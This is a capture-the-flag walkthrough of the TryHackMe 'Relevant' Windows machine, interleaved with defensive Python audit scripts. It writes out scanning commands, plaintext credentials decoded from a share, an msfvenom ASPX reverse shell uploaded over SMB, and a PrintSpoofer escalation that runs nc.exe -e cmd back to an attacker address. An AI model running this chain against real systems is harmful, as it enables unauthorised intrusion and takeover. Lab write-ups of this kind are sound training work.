In the vast world of cybersecurity, sometimes, it’s the smallest of details that can lead to the biggest breakthroughs. It’s no surprise then, that in my recent foray into the ‘Relevant’ room on TryHackMe, I found myself engrossed in a painstaking process of meticulous enumeration. But isn’t that the very essence of hacking? Peeling back the layers, digging deep, and leveraging a myriad of tools until we strike gold. In this post, I’ll be guiding you through the winding paths I took, the tools I employed, and the methodologies I leaned on to unravel the mysteries of ‘Relevant’. Whether you’re a seasoned ethical hacker or just starting your journey, there’s something to learn and discover here. So, grab your virtual lock picks and let’s embark on this captivating journey together!

Enumeration
Nmap scan:
nmap -n -Pn -sT -sV -T4 -vv 10.10.102.149

Open ports:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

If we browse to the web server by its IP address we will see the default IIS webpage:

Enumeration of hidden directories with “ffuf”:
sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.10.11.204:80/FUZZ -v

But I didn’t see any new directory:
:: Method : GET
:: URL : http://10.10.102.149/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 703, Words: 27, Lines: 32]
| URL | http://10.10.102.149/
* FUZZ:
:: Progress: [4614/4614] :: Job [1/1] :: 99 req/sec :: Duration: [0:01:43] :: Errors: 5 ::
Let’s enumerate the SMB service with enum4linux:
enum4linux -a 10.10.102.149
But it returned no useful results:

Let’s try to enumerate all ports with nmap (-p-):
nmap -n -sT -Pn -sV -T4 -p- -vv 10.10.102.149

This time we see more open ports:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49663/tcp open http syn-ack Microsoft IIS httpd 10.0
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
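The two port tables above are worth diffing, and the gap between them is the lesson of this section: the default scan covers only nmap's most common ports, so WinRM and the second IIS listener were invisible until the -p- scan. Below is an added example (my own Python, not part of the writeup) that parses nmap's `PORT STATE SERVICE REASON VERSION` table, lists the ports the default scan missed, and flags anything outside a web-server baseline. The sample text is the writeup's two scans re-typed; the baseline and the risk notes are my assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the port tables from the writeup's default scan and
# its full-port (-p-) scan, as nmap -sV -vv prints them.
SCAN_DEFAULT = """\
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

SCAN_FULL = """\
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49663/tcp open http syn-ack Microsoft IIS httpd 10.0
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+)\s*(?P<version>.*)$"
)


@dataclass(frozen=True)
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str


# Baseline for an internet-facing IIS host (assumption: the reviewer's own
# policy, not anything the writeup states): only HTTP/HTTPS belong on the edge.
EXPECTED_PORTS = {80, 443}
SERVICE_NOTES = {
    "microsoft-ds": "SMB reachable: file shares, and the MS17-010 class of bugs",
    "netbios-ssn": "NetBIOS session service reachable",
    "ms-wbt-server": "RDP reachable",
    "msrpc": "MS-RPC (endpoint mapper or dynamic RPC port) reachable",
}
PORT_NOTES = {5985: "WinRM over HTTP reachable"}


def parse_nmap(text):
    """Turn the `PORT STATE SERVICE REASON VERSION` table into PortRecords."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            records.append(PortRecord(int(m["port"]), m["proto"], m["state"],
                                      m["service"], m["version"].strip()))
    return records


def new_ports(before, after):
    """Ports the second scan found that the first did not (sorted)."""
    seen = {r.port for r in before}
    return sorted(r.port for r in after if r.port not in seen)


def flag_exposure(records):
    """(port, service, note) for every open port outside the baseline."""
    findings = []
    for r in records:
        if r.state != "open" or r.port in EXPECTED_PORTS:
            continue
        note = (PORT_NOTES.get(r.port) or SERVICE_NOTES.get(r.service)
                or "open port outside the web baseline")
        findings.append((r.port, r.service, note))
    return findings


if __name__ == "__main__":
    default, full = parse_nmap(SCAN_DEFAULT), parse_nmap(SCAN_FULL)
    print("missed by the default scan:", new_ports(default, full))
    for port, service, note in flag_exposure(full):
        print(f"{port}/{service}: {note}")
```

The parser keys on the `N/tcp` prefix, so it ignores the header and the `Service Info:` trailer; feeding it `-oN` output from a real run works the same way.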

At this point we will try to enumerate vulnerabilities with Nmap’s vuln scripts:
nmap -n -sT -Pn -sV -T4 --script=vuln 10.10.67.204 -vv
The scan reports the machine as vulnerable to “ms17-010”:

We will keep enumerating, this time more specifically with smbclient, listing the available shares:
smbclient -L 10.10.67.204

We have discovered a shared folder. Now we will try to connect to it with smbclient:
smbclient '\\10.10.67.204\nt4wrksv'
We have detected a password file inside the shared folder:

The next step is to download it:
get passwords.txt
Now we have a user and password, encoded:

Let’s try to brute-force the user and the password. I checked the first hash and it looks like base64:

The next step is to decode the base64 string, which gives us a user and password:
Bob:!P@$W0rD!123

The next hash also looks like base64:

After decoding it we get another user and password:
Bill:Juw4nnaM4n420696969!$$
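Spotting these by eye works for two lines; on a share full of text files you want the same check automated. Added example (my own code, not from the writeup): a small scanner for files like the one above, with a base64 pre-filter, strict decoding, and a `user:secret` split on the result. The file contents are constructed by re-encoding the two credentials the writeup decoded; the header line is an assumption.

```python
import base64
import binascii
import re
import string

B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)

# Constructed sample (assumption): a passwords.txt laid out like the one found
# on the share, with the two credentials the writeup decodes re-encoded here.
SAMPLE_PASSWORDS_TXT = "\n".join([
    "[User Passwords - Encoded]",
    base64.b64encode(b"Bob:!P@$W0rD!123").decode(),
    base64.b64encode(b"Bill:Juw4nnaM4n420696969!$$").decode(),
    "",
])


def looks_like_base64(token):
    """Cheap pre-filter: base64 alphabet, optional '=' padding, length % 4 == 0."""
    token = token.strip()
    return (len(token) >= 8 and len(token) % 4 == 0
            and B64_TOKEN.match(token) is not None)


def try_decode(token):
    """Decode strictly; return text only if the result is printable, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")          # UnicodeDecodeError is a ValueError
    except (binascii.Error, ValueError):
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_encoded_credentials(text):
    """Return (line_number, user, secret) for every decodable 'user:secret' token."""
    found = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for token in line.split():
            if not looks_like_base64(token):
                continue
            decoded = try_decode(token)
            if decoded and ":" in decoded:
                user, _, secret = decoded.partition(":")
                found.append((lineno, user, secret))
    return found


if __name__ == "__main__":
    # Print users and secret lengths only, so a scan report does not leak the secrets.
    for lineno, user, secret in find_encoded_credentials(SAMPLE_PASSWORDS_TXT):
        print(f"line {lineno}: user={user!r} secret length={len(secret)}")
```

The pre-filter rejects ordinary English words on length and alphabet alone, and `validate=True` makes `b64decode` refuse anything outside the alphabet instead of silently skipping it, so false positives come down to short tokens that happen to decode to printable text with a colon in it.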

At this point we will enumerate the other web server, on port “49663”, and try to detect hidden folders:
gobuster dir -u http://10.10.13.126:49663/ -w directory-list-2.3-medium.txt -s '200,301' --no-error
- -u: Target URL.
- -w: Wordlist.
- -s: Positive status codes; only responses with these status codes are shown.
- --no-error: Do not display errors.
- -t: Number of concurrent threads (default 10).

Finally, we find the same directory (the nt4wrksv share) served by the web server on port “49663”:

If we open it in the browser we will see that we can read the share’s files through the web server:
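What makes this exploitable is a configuration detail rather than a software bug: a writable SMB share whose directory is also under the document root of an IIS site. The following added example (my own Python, not the author's) audits a share inventory against a site inventory for exactly that overlap and reports whether the share is writable by broad principals and whether it already holds server-side script files. The share, site and file data are constructed to mirror the writeup's layout; the extension list and the principal names are assumptions.

```python
from pathlib import PureWindowsPath

# Constructed inventory (assumption): what an administrator would gather from the
# SMB share list and the IIS site list. It models the writeup's layout: the
# nt4wrksv share sits under the IIS wwwroot and is writable by everyone.
SHARES = [
    {"name": "nt4wrksv", "path": r"C:\inetpub\wwwroot\nt4wrksv", "writable_by": ["Everyone"]},
    {"name": "backups", "path": r"D:\backups", "writable_by": ["BUILTIN\\Administrators"]},
]
SITES = [
    {"name": "Default Web Site", "bindings": [80, 49663], "physical_path": r"C:\inetpub\wwwroot"},
]
SHARE_FILES = {"nt4wrksv": ["passwords.txt", "relevant.aspx"], "backups": ["db.bak"]}

# Extensions IIS hands to a script engine or loads as code (assumption: tune to
# the handler mappings actually enabled on the site).
SERVER_SIDE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".dll", ".exe"}
BROAD_PRINCIPALS = {"everyone", "authenticated users", "users", "anonymous logon"}


def parts_lower(path):
    return [p.lower() for p in PureWindowsPath(path).parts]


def under(path, root):
    """True if `path` is `root` or lies beneath it (case-insensitive, like NTFS)."""
    p, r = parts_lower(path), parts_lower(root)
    return p[:len(r)] == r


def audit_shares(shares, sites, share_files):
    """Flag every share whose directory is also served by an IIS site."""
    findings = []
    for share in shares:
        for site in sites:
            if not under(share["path"], site["physical_path"]):
                continue
            root_len = len(PureWindowsPath(site["physical_path"]).parts)
            rel = PureWindowsPath(share["path"]).parts[root_len:]
            broad = sorted(p for p in share["writable_by"] if p.lower() in BROAD_PRINCIPALS)
            executables = sorted(
                f for f in share_files.get(share["name"], [])
                if PureWindowsPath(f).suffix.lower() in SERVER_SIDE_EXT
            )
            findings.append({
                "share": share["name"],
                "site": site["name"],
                "web_path": "/" + "/".join(rel),
                "ports": list(site["bindings"]),
                "broad_write": broad,
                "server_side_files": executables,
                # Writable by a broad principal and reachable over HTTP means any
                # SMB writer gets code run as the application pool identity.
                "severity": "critical" if broad else "high",
            })
    return findings


if __name__ == "__main__":
    for f in audit_shares(SHARES, SITES, SHARE_FILES):
        print(f"[{f['severity']}] share {f['share']} is served at {f['web_path']} "
              f"on ports {f['ports']}; broad write: {f['broad_write']}; "
              f"server-side files present: {f['server_side_files']}")
```

The fix that follows from the finding is to move the share out of the web root or to remove write access for broad principals; either one breaks the upload-then-browse chain used in the next section. Path comparison is done on lower-cased path components rather than on raw strings so that `c:\INETPUB\...` and `C:\inetpub\...` match, as they do on NTFS.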

Initial Exploitation
That means we can upload a file to the share and have the web server execute it. To do that we will generate an ASPX reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.233.9 LPORT=443 -f aspx > relevant.aspx

Let’s upload our shell with smbclient, but first we need to connect to the share:
smbclient '\\10.10.7.182\nt4wrksv'

Now we will upload our shell:

Once our shell is on the server we will start our listener with Metasploit:
use exploit/multi/handler
show options
set LHOST 10.10.233.9
set LPORT 443
exploit -j

Now we can trigger our shell from the browser:
http://10.10.7.182:49663/nt4wrksv/relevant.aspx

We will see the connection arrive at our listener:

Access to our shell:

Finally we will have access to the user flag.
Privilege Escalation
Now we don’t have “Administrator” privileges, so we will need to perform privilege escalation. First of all, we need to check who we are:
whoami

We are running our shell as the service user “iis apppool”. To keep enumerating we will run “winPEAS.exe” to look for ways to escalate privileges:

Then, through our shell, we will execute “winPEAS.bat”:

After running winPEAS I detected the unusual token privilege “SeImpersonatePrivilege”:
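winPEAS surfaces this from the same data `whoami /priv` prints, and the check is simple enough to keep in an audit script for service accounts. Added example (my own Python, not from the writeup or from winPEAS): a parser for `whoami /priv` output that lists the privileges a token holds and reports the high-risk ones, treating a Disabled privilege as held. The sample output is constructed to resemble an IIS application pool identity, and the risk descriptions are my own wording.

```python
import re

# Constructed sample (assumption) of `whoami /priv` output for an IIS application
# pool identity; the writeup's winPEAS run reported SeImpersonatePrivilege on the host.
WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

# Privileges that let a non-admin process reach SYSTEM. The first two are the
# pair the token-impersonation exploits (PrintSpoofer and the potato family)
# rely on; the rest are the other classic ones HackTricks lists.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a token obtained from a local service",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open and inject into any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL (SAM, registry hives)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object and then change its ACL",
    "SeLoadDriverPrivilege": "load a kernel driver",
}


def parse_whoami_priv(text):
    """Map privilege name -> (description, state) from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.rstrip())
        if m:
            privs[m.group(1)] = (m.group(2), m.group(3))
    return privs


def risky_privileges(privs):
    """High-risk privileges the token holds, as (name, state, why) sorted by name.

    'Disabled' is not a mitigation: a held-but-disabled privilege can be
    re-enabled by the process itself, so the check is on membership, not on
    the State column.
    """
    return sorted((name, state, HIGH_RISK[name])
                  for name, (_, state) in privs.items() if name in HIGH_RISK)


if __name__ == "__main__":
    for name, state, why in risky_privileges(parse_whoami_priv(WHOAMI_PRIV_SAMPLE)):
        print(f"{name} ({state}): {why}")
```

Run against the real output of the account an application pool uses, a non-empty result is the cue to run the pool under an identity that is not granted SeImpersonatePrivilege, or to accept that any code execution in that pool is SYSTEM-equivalent.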

We can find information on HackTricks about how to escalate privileges through this token privilege:

We will check which exploit works for our machine; in this case it is “PrintSpoofer”. We can find it here. First of all we need to upload a portable netcat through SMB to get a reverse shell:

Also we need to upload the “PrintSpoofer” exploit:

Now we start our netcat listener:
nc -lvp 4433

Let’s try to exploit the token with “PrintSpoofer”:
PrintSpoofer64.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe 10.10.233.9 4433 -e cmd"

Then we will receive our reverse shell with Administrator privileges:

We have access to the Administrator flag too.